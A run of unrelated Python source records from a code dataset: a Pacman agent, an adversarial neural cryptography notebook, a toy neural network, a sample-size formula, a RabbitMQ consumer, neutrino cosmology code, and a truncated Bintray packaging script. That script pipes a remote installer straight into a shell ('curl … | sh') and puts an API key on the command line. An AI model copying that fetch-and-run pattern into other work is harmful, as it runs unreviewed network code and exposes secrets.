getFeaturesPatrol(self, gameState, action):\n features = util.Counter()\n successor = self.getSuccessor(gameState, action)\n\n myState = successor.getAgentState(self.index)\n myPos = myState.getPosition()\n\n # Computes whether we're on defense (1) or offense (0)\n features['onDefense'] = 1\n if myState.isPacman: features['onDefense'] = 0\n\n # Computes distance to invaders we can see\n enemies = [successor.getAgentState(i) for i in self.getOpponents(successor)]\n invaders = [a for a in enemies if a.isPacman and a.getPosition() != None]\n features['numInvaders'] = len(invaders)\n\n patrolArea = self.frontierPoints[:int(len(self.frontierPoints)/2)]\n features['distToPatrol'] = self.getDistToPatrol(myPos, patrolArea)\n return features\n\n def getWeights(self, gameState, action):\n return {'successorScore': 100, 'distanceToFood': -2.5, \\\n 'distanceToCapsule': -2, 'distToGhost': 30, 'cashIn': 0, \\\n 'stop': -15, 'reverse': -2, 'invaderDistance': -3.5, \\\n 'numInvaders': -3.5, 'isPacman': 3}\n \n def getFoodDistance(self, myPos, food, gameState):\n favoredY = abs(self.height-self.favoredY)\n return self.getMazeDistance(myPos, food) + abs(favoredY - food[1])\n\n def getDistToFriend(self, friendPos, myPos):\n favoredY = abs(self.height-self.favoredY)\n friendDist = self.getMazeDistance(myPos, friendPos)\n if friendDist <= 4:\n return friendDist + favoredY\n return favoredY\n\n ##########################################\n # BELOW IS FOR DEFENSIVE STATE #\n ##########################################\n\n def getFeaturesDefensive(self, gameState, action):\n features = util.Counter()\n successor = self.getSuccessor(gameState, action)\n\n myState = successor.getAgentState(self.index)\n myPos = myState.getPosition()\n\n # Computes whether we're on defense (1) or offense (0)\n features['onDefense'] = 1\n if myState.isPacman: features['onDefense'] = 0\n\n # Computes distance to invaders we can see\n enemies = [successor.getAgentState(i) for i in self.getOpponents(successor)]\n invaders = [a for a in enemies if a.isPacman and a.getPosition() != None]\n\n invaderPos = [a.getPosition() for a in enemies if a.isPacman and a.getPosition() != None]\n if invaderPos:\n for inv in invaderPos:\n features['invaderDistToHome'] += -1/self.getInvaderDistToHome(inv)\n else:\n features['invaderDistToHome'] = 0\n\n features['numInvaders'] = len(invaders)\n\n if len(invaders) > 0:\n dists = [self.getMazeDistance(myPos, a.getPosition()) for a in invaders]\n features['invaderDistance'] = min(dists)\n\n if action == Directions.STOP: features['stop'] = 1\n rev = Directions.REVERSE[gameState.getAgentState(self.index).configuration.direction]\n if action == rev: features['reverse'] = 1\n\n # dist to pacman\n pacmanProbIn = self.beliefInPacmanPosition(gameState)\n features['ToFoodCluster'] = self.getMazeDistance(pacmanProbIn, myPos)\n\n return features\n \n def defendTheCluster(self, gameState):\n foodList = self.getFoodYouAreDefending(gameState).asList()\n bigClusterFood = []\n for food1 in foodList:\n clusterSize = 0\n for food2 in foodList:\n if self.getMazeDistance(food1, food2) <= 3:\n clusterSize += 1\n bigClusterFood.append((food1, clusterSize))\n \n return bigClusterFood\n\n def beliefInPacmanPosition(self, gameState):\n \"\"\"\n Returns a position that our ghost should patrol\n \"\"\"\n enemyDist = []\n positionToPatrol = []\n myPos = gameState.getAgentPosition(self.index)\n enemyPacmanPosition = self.getEnemy(gameState)['Pacman']\n cluster = self.defendTheCluster(gameState)\n minDist = 999\n if enemyPacmanPosition:\n for idx, pos in enemyPacmanPosition:\n curDist = self.getMazeDistance(pos, myPos)\n if minDist > curDist:\n minDist = curDist\n minPos = pos\n return minPos\n\n else:\n allDist = gameState.getAgentDistances()\n enemyDist = []\n for idx in self.enemies:\n enemyDist.append(allDist[idx])\n\n myPos = gameState.getAgentPosition(self.index)\n for c, size in cluster:\n for dist in enemyDist:\n CI = range(dist-4, dist+4)\n if self.getMazeDistance(c, myPos) in CI:\n positionToPatrol.append((c, size))\n if positionToPatrol:\n patrol = sorted(positionToPatrol, key = lambda x: x[1])[-1]\n\n else:\n patrol = sorted(cluster, key = lambda x: x[1])[-1]\n #('=== 596 ===', patrol[0])\n return patrol[0]\n\n\n def getInvaderDistToHome(self, invaderPos):\n dist = [self.getMazeDistance(enemyhome, invaderPos) for enemyhome in self.frontierPointsEnemy]\n return sum(dist)/len(dist)\n\n def evaluateDefensive(self, gameState, action):\n \"\"\"\n Computes a linear combination of features and feature weights\n \"\"\"\n features = self.getFeaturesDefensive(gameState, action)\n weights = self.getWeightsDefensive(gameState, action)\n return features * weights\n\n def getSuccessorDefensive(self, gameState, action):\n \"\"\"\n Finds the next successor which is a grid position (location tuple).\n \"\"\"\n successor = gameState.generateSuccessor(self.index, action)\n pos = successor.getAgentState(self.index).getPosition()\n if pos != util.nearestPoint(pos):\n # Only half a grid position was covered\n return successor.generateSuccessor(self.index, action)\n else:\n return successor\n\n def getWeightsDefensive(self, gameState, action):\n return {'numInvaders': -70, 'onDefense': 100, 'invaderDistToHome': 30, 'invaderDistance': -20, \\\n 'stop': -100, 'reverse': -3, 'ToFoodCluster': -15}\n","sub_path":"myTeam2.5.py","file_name":"myTeam2.5.py","file_ext":"py","file_size_in_byte":58142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"247953002","text":"\n# coding: utf-8\n\n# In[1]:\n\nimport time\nimport os\n\nimport tensorflow as tf\nimport numpy as np\nimport pandas as pd\n\n\n# In[2]:\n\nfrom argparse import ArgumentParser\nfrom model import CryptoNet\nfrom config import *\n\n\n# In[3]:\n\nmsg_len = 16\n# key_len = [16, 14, 12, 10, 8, 6, 4, 2]\nkey_len = [14, 12, 10, 8, 6, 4, 2]\n\n# epochs = 1\nepochs = 15000\nbatch_size = 4096\nlearning_rate = 0.0008\n# iterations = 2000\niterations = 1\nrounds = 5\n\n\n# In[4]:\n\nfor current_key_len in key_len:\n print(\"\")\n print(\"Current key is: \", current_key_len)\n \n for i in range(rounds):\n print(\"Current round is: \", i)\n\n print(\"Record the time:\")\n print(time.strftime(\"%d_%m_%Y_%H_%M_%S\"))\n start_time = time.time()\n\n tf.reset_default_graph()\n sess = tf.Session()\n\n crypto_net = CryptoNet(sess, iterations, msg_len=msg_len, key_len = current_key_len, epochs=epochs,\n batch_size=batch_size, learning_rate=learning_rate)\n\n crypto_net.train()\n\n\n end_time = time.time()\n print(\"--- %s seconds ---\" % (end_time - start_time)) \n\n\n eve_msg_error = crypto_net.get_eve_msg_errors()\n bob_msg_error = crypto_net.get_bob_msg_errors()\n eve_error = crypto_net.get_eve_errors()\n bob_error = crypto_net.get_bob_errors()\n\n\n # filename = \"../../record/error_0\" + time.strftime(\"_%d_%m_%Y_%H_%M_%S\") + '.csv'\n # filename = \"../../record/error_1\" + time.strftime(\"_%d_%m_%Y_%H_%M_%S\") + '.csv'\n # intial\n # filename = \"../../record/error_2\" + time.strftime(\"_%d_%m_%Y_%H_%M_%S\") + '.csv'\n # with bob_output_sign and eve_output_sign\n # filename = \"../../record/error_3\" + time.strftime(\"_%d_%m_%Y_%H_%M_%S\") + '.csv'\n # with all bias terms\n filename = \"../../record/error_4\" + time.strftime(\"_%d_%m_%Y_%H_%M_%S\") + '.csv'\n # with all bias terms + differnt key_len\n filename = \"../../record/error_5_\" + str(current_key_len) + time.strftime(\"_%d_%m_%Y_%H_%M_%S\") + '.csv'\n\n d = {'eve_error': eve_error, 'bob_error': bob_error,\n 'eve_msg_error': eve_msg_error, 'bob_msg_error': bob_msg_error}\n data_frame = pd.DataFrame(data = d)\n data_frame.to_csv(filename)\n\n\n# In[ ]:\n\n\n\n\n# In[ ]:\n\n\"\"\"\nRead the error file\n\"\"\"\n\npre_index = ['error_0_', 'error_1_', 'error_2_', 'error_3_', 'error_4_', 'error_5_']\nroot_dir = \"../../record/\"\n\nfilename_num = 20\nitemsize = 100\n\nfilename = np.chararray((len(pre_index), filename_num), itemsize = itemsize)\nfilename_pos = np.asarray([0 for i in range(len(pre_index))])\n\n\n# In[ ]:\n\n\n\n\n# In[3]:\n\nfor i in os.listdir(root_dir):\n current_filename = root_dir + i\n \n for j in range(len(pre_index)):\n if(current_filename.find(pre_index[j]) != -1):\n filename[j][filename_pos[j]] = current_filename\n filename_pos[j] = filename_pos[j] + 1\n\n# print(current_filename)\n\n\n# In[40]:\n\nimport plotly\nimport plotly.plotly as py\nimport plotly.graph_objs as go\n\nplotly.offline.init_notebook_mode()\n\n\n# In[43]:\n\nfile_to_read = str(filename[4][1],'utf-8')\n\nprint(file_to_read)\n\n\n# In[44]:\n\n\n\nerror = pd.read_csv(file_to_read)\neve_error = np.asarray(error.eve_error)\nbob_error = np.asarray(error.bob_error)\n\nindex = np.array([i for i in range(bob_error.shape[0])])\n\ntrace0 = go.Scatter(\n x = index,\n y = bob_error,\n mode = 'lines+markers',\n name = 'bob_error'\n)\ntrace1 = go.Scatter(\n x = index,\n y = eve_error,\n mode = 'lines+markers',\n name = 'eve_error'\n)\n\ndata = [trace0, trace1]\n\nplotly.offline.iplot(data, filename='line-mode')\n\n\n# In[ ]:\n\n\n\n","sub_path":"adversarial_neural_cryptography/src/original_jupyter.py","file_name":"original_jupyter.py","file_ext":"py","file_size_in_byte":3591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"122692433","text":"from functions import cross_entropy_loss_prime\nfrom functions import cross_entropy_loss\nfrom functions import ReLu, ReLu_prime, softmax, softmax_prime\nimport numpy as np\n\nclass Layer:\n def __init__(self, size:tuple, activation:tuple) -> None:\n super().__init__()\n self.weights = np.random.rand(size[1], size[0])\n self.input = np.zeros((1, size[0]))\n self.output:np.ndarray\n self.activation = activation[0]\n self.deactivation = activation[1]\n self.bias = np.ones((1, size[0]))\n def forward_propagation(self,inputs):\n self.input = inputs\n self.input = np.dot(self.input, self.weights)\n # print(self.output, \"<-- out\")\n # print(self.bias, \"<-- bias\")\n self.input += self.bias\n self.activate()\n\n def backward_propagation(self, error, learning_rate):\n print(error , \"<----err\", error.shape)\n print(self.weights , \"<----weights\", self.weights.shape)\n print(self.deriv() , \"<----deriv\", self.deriv().shape)\n print(self.output , \"<----deriv\", self.output.shape)\n\n self.weights -= learning_rate * error* np.dot(np.dot(self.weights.T , self.deriv()), self.output)\n return error * np.dot(self.weights.T , self.deriv())\n \n def activate(self):\n self.output = self.activation(self.input)\n\n def deriv(self):\n return self.deactivation(self.output)\n\n\nclass Network:\n def __init__(self, epochs, learning_rate) -> None:\n super().__init__()\n self.layers:list[Layer] = []\n self.error:np.array\n self.loss = ...\n self.loss_prime = ...\n self.learning_rate = learning_rate\n\n def train(self, input_data, output_data):\n\n for data in zip(input_data, output_data):\n #might be faster if 0th elemtn is done outside instead of if\n for index, layer in enumerate(self.layers):\n if index != 0:\n layer.forward_propagation(self.layers[index-1].output)\n else:\n layer.forward_propagation(np.array([data[0]]))\n #true false loss\n self.error = self.loss(data[1], self.layers[-1].output)\n self.gradient_error = self.loss_prime(data[1], self.layers[-1].output)\n\n # print(self.error)\n # print(self.gradient_error)\n\n for index, layer in enumerate(reversed(self.layers)):\n print(index, '____INDEX____')\n if index != 0:\n self.error = layer.backward_propagation(self.gradient_error, self.learning_rate)\n else:\n layer.weights -= self.learning_rate * np.dot(self.gradient_error,layer.output.T)\n self.error = np.dot(self.gradient_error, layer.output.T)\n \n # print(self.error)\n\n def add(self, layer:Layer):\n self.layers.append(layer)\n\n def use(self, loss_function, deriv_loss):\n self.loss = loss_function\n self.loss_prime = deriv_loss\n\n\nn = Network(1, 1)\nn.use(cross_entropy_loss, cross_entropy_loss_prime)\nn.add(Layer((7,4),(ReLu, ReLu_prime)))\nn.add(Layer((5,7),(ReLu, ReLu_prime)))\nn.add(Layer((3,5),(softmax, softmax_prime)))\n\ninput_data = np.array([[5.1,3.5,1.4,0.2], [6.8,3.2,5.9,2.3]])\noutput_data = np.array([[1,0,0], [0,0,1]])\n# print(zip(input_data, output_data))\nn.train(input_data=input_data, output_data=output_data)","sub_path":"NeuralNetworks/NeuralFromScratch/layers.py","file_name":"layers.py","file_ext":"py","file_size_in_byte":3408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"396319597","text":"# Cochran’s Sample Size Formula\nfrom Calculator.Multiplication import multiplication\nfrom Calculator.Division import division\nfrom Calculator.Squared import squared\n\n\n# = ((Z-Value)^2 * (p) * (q)) / (e)^2\n\ndef cochran(z, p, q, e):\n try:\n z = float(z)\n p = float(p)\n q = float(q)\n e = float(e)\n\n num1 = z * z\n num2 = p * q\n num3 = e * e\n num4 = num1 *num2\n result = round(num4 / num3)\n return result\n\n except ZeroDivisionError:\n print('Error! Cannot divide by 0')\n except ValueError:\n print('Error! Invalid data inputs')\n\n\n\n# Z,p,q,e,Sample\n# 1.96,0.5,0.5,0.05,384\n\n\n# num1 = 3.8416\n# num2 = 0.25\n# num3 = 0.0025\n# num4 = 0.9604\n# return = 384.16\n","sub_path":"PopulationSampling/CochransFormula.py","file_name":"CochransFormula.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"349984282","text":"#!/usr/bin/env python\nimport pika\n\nconnection = pika.BlockingConnection(\n pika.ConnectionParameters(host='localhost'))\n\nchannel = connection.channel()\n\nchannel.exchange_declare(exchange='event',\n exchange_type='direct')\n\n\nchannel.queue_declare(queue='redis')\nchannel.queue_declare(queue='mailgun')\n\nchannel.queue_bind(exchange='event',\n queue='redis', routing_key='mymsg')\n\nchannel.queue_bind(exchange='event',\n queue='mailgun', routing_key='mymsg')\n\nprint(' [*] Waiting for logs. To exit press CTRL+C')\n\n\ndef callback(ch, method, properties, body):\n print(\" [x] %r\" % body)\n\nchannel.basic_consume(callback,\n queue='redis')\n\nchannel.start_consuming()\n","sub_path":"rabbitmq_examples/receive_event.py","file_name":"receive_event.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"12721775","text":"import logging\nfrom astropy import units as u\nimport astropy\nfrom astropy.cosmology import Planck15 as cosmo\nfrom astropy.coordinates import Distance\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nfrom flarestack.shared import plots_dir\nfrom flarestack.core.energy_pdf import EnergyPDF, read_e_pdf_dict\n\ndef get_diffuse_flux_at_100TeV(fit=\"joint_15\"):\n \"\"\"Returns value for the diffuse neutrino flux, based on IceCube's data.\n The fit can be specified (either 'Joint' or 'Northern Tracks') to get\n corresponding values from different analyses\n\n :param fit: Fit of diffuse flux to be used\n :return: Best fit diffuse flux at 100 TeV, and best fit spectral index\n \"\"\"\n\n if fit in [\"joint_15\", \"joint\"]:\n # IceCube Joint Best Fit\n # (https://arxiv.org/abs/1507.03991)\n all_flavour_diffuse_flux = 6.7 * 10 ** -18 * (\n u.GeV ** -1 * u.cm ** -2 * u.s ** -1 * u.sr ** -1\n )\n diffuse_flux = all_flavour_diffuse_flux / 3.\n diffuse_gamma = 2.5\n\n if fit == \"joint\":\n logging.warning(\"Fit 'joint' was used, without a specified year.\"\n \"Assuming 'joint_15', from https://arxiv.org/abs/1507.03991.\")\n\n elif fit in [\"northern_tracks_17\"]:\n # Best fit from the Northern Tracks 'Diffuse Sample'\n # https://pos.sissa.it/301/1005/pdf\n diffuse_flux = 1.01 * 10 ** -18 * (\n u.GeV ** -1 * u.cm ** -2 * u.s ** -1 * u.sr ** -1\n )\n diffuse_gamma = 2.19\n\n elif fit in [\"northern_tracks_19\", \"northern_tracks\"]:\n # Best fit from the Northern Tracks 'Diffuse Sample'\n # https://arxiv.org/abs/1908.09551\n diffuse_flux = 1.44 * 10 ** -18 * (\n u.GeV ** -1 * u.cm ** -2 * u.s ** -1 * u.sr ** -1\n )\n diffuse_gamma = 2.29\n\n if fit == \"northern_tracks\":\n logging.warning(\"Fit 'northern_tracks' was used, without a specified year.\"\n \"Assuming 'northern_tracks_19', from https://arxiv.org/abs/1908.09551.\")\n\n else:\n raise Exception(\"Fit '{0}' not recognised! \\n\"\n \"The following fits are available: \\n\"\n \"'joint_15', 'northern_tracks_17', 'northern_tracks_19'\".format(fit, ))\n\n return diffuse_flux, diffuse_gamma\n\n\ndef get_diffuse_flux_at_1GeV(fit=\"joint_15\"):\n \"\"\"Returns the IceCube diffuse flux at 1GeV, to match flarestack\n convention for flux measurements.\n\n :param fit: Fit of diffuse flux to be used\n :return: Best fit diffuse flux at 1 GeV, and best fit spectral index\n \"\"\"\n diffuse_flux, diffuse_gamma = get_diffuse_flux_at_100TeV(fit)\n return diffuse_flux * (10 ** 5) ** diffuse_gamma, diffuse_gamma\n\n\ndef sfr_madau(z):\n \"\"\"\n star formation history\n http://arxiv.org/pdf/1403.0007v3.pdf\n Madau & Dickinson 2014, Equation 15\n result is in solar masses/year/Mpc^3\n\n \"\"\"\n rate = 0.015 * (1+z)**2.7 / (1 + ((1+z)/2.9)**5.6) /(\n u.Mpc**3 * u.year\n )\n\n return rate\n\n\ndef sfr_clash_candels(z):\n \"\"\"\n star formation history\n https://arxiv.org/pdf/1509.06574.pdf\n\n result is in solar masses/year/Mpc^3\n\n Can match Figure 6, if the h^3 factor is divided out\n \"\"\"\n rate = 0.015 * (1+z)**5.0 / (1 + ((1+z)/1.5)**6.1) /(\n u.Mpc**3 * u.year\n )\n\n return rate\n\n\ndef integrate_over_z(f, zmin=0.0, zmax=8.0):\n\n nsteps = 1e3\n\n zrange, step = np.linspace(zmin, zmax, int(nsteps + 1), retstep=True)\n int_sum = 0.0\n\n for i, z in enumerate(zrange[1:-1]):\n int_sum += 0.5 * step * (f(z) + f(zrange[i+2]))\n\n return int_sum\n\n\ndef cumulative_z(f, zrange):\n\n ints = []\n\n nsteps = 1e3 + 1\n\n if isinstance(zrange, np.ndarray):\n step = zrange[1] - zrange[0]\n else:\n zrange, step = np.linspace(0.0, zrange, int(nsteps + 1), retstep=True)\n\n int_sum = 0.0\n\n for i, z in enumerate(zrange[1:-1]):\n int_sum += 0.5 * step * (f(z) + f(zrange[i + 2]))\n ints.append(astropy.units.quantity.Quantity(int_sum))\n\n return ints\n\n\ndef define_cosmology_functions(rate, nu_e_flux_1GeV, gamma,\n nu_bright_fraction=1.):\n\n def rate_per_z(z):\n \"\"\" Equals rate as a function of z, multiplied by the differential\n comoving volume, multiplied by 4pi steradians for full sphere,\n multiplied by the neutrino-bright fraction, and then divided by (1+z)\n to account for time dilation which reduces the rate of transients at\n high redshifts.\n\n :param z: Redshift\n :return: Transient rate in shell at that redshift\n \"\"\"\n return rate(z) * cosmo.differential_comoving_volume(z) * \\\n nu_bright_fraction * (4 * np.pi * u.sr) / (1+z)\n\n def nu_flux_per_source(z):\n \"\"\"Calculate the time-integrated neutrino flux contribution on Earth\n per source. Equal to the flux normalisation per source at 1GeV,\n divided by the sphere 4 pi dl^2 to give the flux at 1GeV on Earth.\n This then needs to be corrected by factors of (1+z)-gamma to account\n for the redshifting of the spectrum to lower energy values. This\n assumes that he power law extends beyond the traditional icecube\n sensitivity range.\n\n :param z: Redshift of shell\n :return: Neutrino flux from shell at Earth\n \"\"\"\n return nu_e_flux_1GeV * (1 + z) ** (3 - gamma) / (\n 4 * np.pi * Distance(z=z).to(\"cm\")**2)\n\n def nu_flux_per_z(z):\n \"\"\"Calculate the neutrino flux contribution on Earth that each\n redshift shell contributes. Equal to the rate of sources per shell,\n multiplied by the flux normalisation per source at 1GeV, divided by\n the sphere 4 pi dl^2 to give the flux at 1GeV on Earth. This then\n needs to be corrected by factors of (1+z)-gamma to account for the\n redshifting of the spectrum to lower energy values. This assumes that\n the power law extends beyond the traditional icecube sensitivity range.\n\n :param z: Redshift of shell\n :return: Neutrino flux from shell at Earth\n \"\"\"\n return rate_per_z(z).to(\"s-1\") * nu_flux_per_source(z) / (\n 4 * np.pi * u.sr)\n\n def cumulative_nu_flux(z):\n \"\"\"Calculates the integrated neutrino flux on Earth for all sources\n lying within a sphere up to the given redshift. Uses numerical\n intergration to calculate this, given the source rate and neutrino\n flux per source.\n\n :param z: Redshift up to which neutrino flux is integrated\n :return: Cumulative neutrino flux at 1 GeV\n \"\"\"\n return cumulative_z(nu_flux_per_z, z)\n\n return rate_per_z, nu_flux_per_z, nu_flux_per_source, cumulative_nu_flux\n\n\ndef calculate_transient_cosmology(e_pdf_dict, rate, name, zmax=8.,\n nu_bright_fraction=1.0,\n diffuse_fraction=None,\n diffuse_fit=\"joint_15\"):\n\n e_pdf_dict = read_e_pdf_dict(e_pdf_dict)\n\n diffuse_flux, diffuse_gamma = get_diffuse_flux_at_1GeV(diffuse_fit)\n\n logging.info(\"Using the {0} best fit values of the diffuse flux.\".format(diffuse_fit))\n # print \"Raw Diffuse Flux at 1 GeV:\", diffuse_flux / (4 * np.pi * u.sr)\n logging.info(\"Diffuse Flux at 1 GeV: {0}\".format(diffuse_flux))\n logging.info(\"Diffuse Spectral Index is {0}\".format(diffuse_gamma))\n\n if \"gamma\" not in e_pdf_dict:\n logging.warning(\"No spectral index has been specified. \"\n \"Assuming source has spectral index matching diffuse flux\")\n e_pdf_dict[\"gamma\"] = diffuse_gamma\n\n energy_pdf = EnergyPDF.create(e_pdf_dict)\n nu_e = e_pdf_dict[\"source_energy_erg\"]\n gamma = e_pdf_dict[\"gamma\"]\n\n logging.info(name)\n logging.info(\"Neutrino Energy is {0}\".format(nu_e))\n logging.info(\"Rate is {0}\".format(rate(0.0)))\n\n savedir = plots_dir + \"cosmology/\" + name + \"/\"\n\n try:\n os.makedirs(savedir)\n except OSError:\n pass\n\n fluence_conversion = energy_pdf.fluence_integral() * u.GeV ** 2\n\n nu_e = nu_e.to(\"GeV\") / fluence_conversion\n\n zrange, step = np.linspace(0.0, zmax, int(1 + 1e3), retstep=True)\n\n rate_per_z, nu_flux_per_z, nu_flux_per_source, cumulative_nu_flux = \\\n define_cosmology_functions(rate, nu_e, gamma, nu_bright_fraction)\n\n logging.info(\"Cumulative sources at z=8.0: {:.3E}\".format(cumulative_z(rate_per_z, 8.0)[-1].value))\n\n nu_at_horizon = cumulative_nu_flux(8)[-1]\n\n logging.info(\"Cumulative flux at z=8.0 (1 GeV): {:.3E}\".format(nu_at_horizon))\n logging.info(\"Cumulative annual flux at z=8.0 (1 GeV): {:.3E}\".format((\n nu_at_horizon * u.yr).to(\"GeV-1 cm-2 sr-1\")))\n\n ratio = nu_at_horizon.value / diffuse_flux.value\n logging.info(\"Fraction of diffuse flux {0}\".format(ratio))\n logging.info(\"Cumulative neutrino flux {0}\".format(nu_at_horizon))\n logging.debug(\"Diffuse neutrino flux {0}\".format(diffuse_flux))\n\n if diffuse_fraction is not None:\n logging.info(\"Scaling flux so that, at z=8, the contribution is equal to {0}\".format(diffuse_fraction))\n nu_e *= diffuse_fraction / ratio\n logging.info(\"Neutrino Energy rescaled to {0}\".format((nu_e * fluence_conversion).to(\"erg\")))\n\n plt.figure()\n plt.plot(zrange, rate(zrange))\n plt.yscale(\"log\")\n plt.xlabel(\"Redshift\")\n plt.ylabel(r\"Rate [Mpc$^{-3}$ year$^{-1}$]\")\n plt.tight_layout()\n plt.savefig(savedir + 'rate.pdf')\n plt.close()\n\n plt.figure()\n plt.plot(zrange, rate_per_z(zrange) / rate(zrange))\n plt.yscale(\"log\")\n plt.xlabel(\"Redshift\")\n plt.ylabel(r\"Differential Comoving Volume [Mpc$^{3}$ dz]\")\n plt.tight_layout()\n plt.savefig(savedir + 'comoving_volume.pdf')\n plt.close()\n\n logging.debug(\"Sanity Check:\")\n logging.debug(\"Integrated Source Counts \\n\")\n\n for z in [0.01, 0.08, 0.1, 0.2, 0.3, 0.7, 8]:\n logging.debug(\"{0}, {1}, {2}\".format(\n z, Distance(z=z).to(\"Mpc\"), cumulative_z(rate_per_z, z)[-1])\n )\n\n nearby = 0.3\n\n logging.info(\n \"Fraction from nearby (z<{0}) sources: {1}\".format(\n nearby, cumulative_nu_flux(nearby)[-1] / nu_at_horizon\n )\n )\n\n plt.figure()\n plt.plot(zrange, rate_per_z(zrange))\n plt.yscale(\"log\")\n plt.ylabel(\"Differential Source Rate [year$^{-1}$ dz]\")\n plt.xlabel(\"Redshift\")\n plt.tight_layout()\n plt.savefig(savedir + 'diff_source_count.pdf')\n plt.close()\n\n plt.figure()\n plt.plot(zrange[1:-1], [x.value for x in cumulative_z(rate_per_z, zrange)])\n plt.yscale(\"log\")\n plt.ylabel(\"Cumulative Sources\")\n plt.xlabel(\"Redshift\")\n plt.tight_layout()\n plt.savefig(savedir + 'integrated_source_count.pdf')\n plt.close()\n\n plt.figure()\n plt.plot(zrange[1:-1], nu_flux_per_z(zrange[1:-1]))\n plt.yscale(\"log\")\n plt.xlabel(\"Redshift\")\n plt.tight_layout()\n plt.savefig(savedir + 'diff_vol_contribution.pdf')\n plt.close()\n\n cum_nu = [x.value for x in cumulative_nu_flux(zrange)]\n\n plt.figure()\n plt.plot(zrange[1:-1], cum_nu)\n plt.yscale(\"log\")\n plt.xlabel(\"Redshift\")\n plt.ylabel(r\"Cumulative Neutrino Flux [ GeV$^{-1}$ cm$^{-2}$ s$^{-1}$ ]\")\n plt.axhline(y=diffuse_flux.value, color=\"red\", linestyle=\"--\")\n plt.tight_layout()\n plt.savefig(savedir + 'int_nu_flux_contribution.pdf')\n plt.close()\n\n plt.figure()\n plt.plot(zrange[1:-1],\n [nu_flux_per_z(z).value for z in zrange[1:-1]])\n plt.yscale(\"log\")\n plt.xlabel(\"Redshift\")\n plt.ylabel(\n r\"Differential Neutrino Flux [ GeV$^{-1}$ cm$^{-2}$ s$^{-1}$ dz]\")\n plt.axhline(y=diffuse_flux.value, color=\"red\", linestyle=\"--\")\n plt.tight_layout()\n plt.savefig(savedir + 'diff_nu_flux_contribution.pdf')\n plt.close()\n\n plt.figure()\n plt.plot(zrange[1:-1],\n [(nu_flux_per_source(z)).value for z in zrange[1:-1]])\n plt.yscale(\"log\")\n plt.xlabel(\"Redshift\")\n plt.ylabel(\n r\"Time-Integrated Flux per Source [ GeV$^{-1}$ cm$^{-2}$]\")\n plt.tight_layout()\n plt.savefig(savedir + 'nu_flux_per_source_contribution.pdf')\n plt.close()\n\n return nu_at_horizon\n\n\n# def estimate_northern_neutrinos(diffuse_fit=\"joint\"):\n# diffuse_flux, diffuse_gamma = get_diffuse_flux_at_1GeV(diffuse_fit)\n#\n# print(\"\\n\")\n#\n# print(\"Let's assume that 50% of the diffuse flux is distributed on a \\n\" \\\n# \"single source in the northern sky. That's unrealistic, but \\n \" \\\n# \"should give us an idea of expected neutrino numbers! \\n\")\n#\n# source = np.load(ps_catalogue_name(0.2))\n#\n# inj_kwargs = {\n# \"injection_time_pdf\": {\n# \"time_pdf_name\": \"Steady\"\n# },\n# \"injection_energy_pdf\": {\n# \"energy_pdf_name\": \"PowerLaw\",\n# \"gamma\": diffuse_gamma,\n# \"flux_at_1_gev\": diffuse_flux*0.5\n# }\n# }\n#\n# calculate_neutrinos(source[0], IC86_1_dict, inj_kwargs)\n\n#\n# if __name__ == \"__main__\":\n# estimate_northern_neutrinos(diffuse_fit=\"joint\")\n# estimate_northern_neutrinos(diffuse_fit=\"northern_tracks\")\n","sub_path":"flarestack/utils/neutrino_cosmology.py","file_name":"neutrino_cosmology.py","file_ext":"py","file_size_in_byte":13134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"52035771","text":"import os, argparse\n\n# Please read pipeline_instructions.py before working on this file\n\nGIT_REPO_NAME = os.environ[\"GIT_REPO_NAME\"]\nARCH = os.environ[\"ARCH\"]\nBT_REPO_RPM = os.environ[\"BINTRAY_REPO_RPM\"]\nBT_SUBJECT = os.environ[\"BINTRAY_SUBJECT\"]\nBT_USER = os.environ[\"BINTRAY_USER\"]\nBT_KEY = os.environ[\"BINTRAY_KEY\"]\nPKG_VERSION = os.environ[\"PKG_VERSION\"]\nPKG_PATH_RPM = GIT_REPO_NAME + \"/\" + ARCH + \"/\"\nPKG_NAME = GIT_REPO_NAME + \"-\" + ARCH + \"-\" + PKG_VERSION\nPKG_NAME_RPM = PKG_NAME + \".rpm\"\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-step_name\")\nargs = parser.parse_args()\n\ndef after_success():\n package()\n deploy()\n \ndef package():\n package_rpm()\n \ndef deploy():\n print(\"Running install_jfrog_cli()\")\n install_jfrog_cli()\n print(\"Running config_jfrog_cli()\")\n config_jfrog_cli()\n \n # rpm_upload_suffix = PKG_NAME_RPM + \" \" + create_pkg_location(BT_REPO_RPM) + \" \" + PKG_PATH_RPM\n rpm_upload_suffix = r'\"(*.rpm)\"' + \" \" + create_pkg_location(BT_REPO_RPM) + \" \" + PKG_PATH_RPM\n \n upload_bintray(rpm_upload_suffix)\n \ndef create_pkg_location(bt_repo_name):\n return BT_SUBJECT + \"/\" + bt_repo_name + \"/\" + GIT_REPO_NAME + \"/\" + PKG_VERSION\n \ndef package_rpm():\n print(\"Packaging RPM\")\n package_cmd=(\n \"go-bin-rpm generate\" +\n \" --file rpm-creation-data.json\" +\n \" --version \" + PKG_VERSION + \n \" --arch \" + ARCH + \n \" -o \" + PKG_NAME_RPM)\n \n print(\"RPM command : \" + \"docker run -v $PWD:/mnt/travis solvingj/go-bin-rpm /bin/sh -c \\\"\" + package_cmd + \"\\\"\")\n os.system(\"docker run -v $PWD:/mnt/travis solvingj/go-bin-rpm /bin/sh -c \\\"\" + package_cmd + \"\\\"\")\n\ndef install_jfrog_cli():\n install_command=(\"curl -fL https://getcli.jfrog.io | sh\")\n print(\"Installing jfrog client with command: \" + install_command)\n os.system(install_command)\n \ndef config_jfrog_cli():\n configure_command=(\n \"./jfrog bt config --user \" + BT_USER + \n \" --key \" + BT_KEY + \n \" --licenses MIT\")\n print(\"Configuring jfrog client for bintray uploads with command: \" + configure_command)\n os.system(configure_command)\n \ndef upload_bintray(upload_cmd_suffix):\n upload_cmd_prefix = 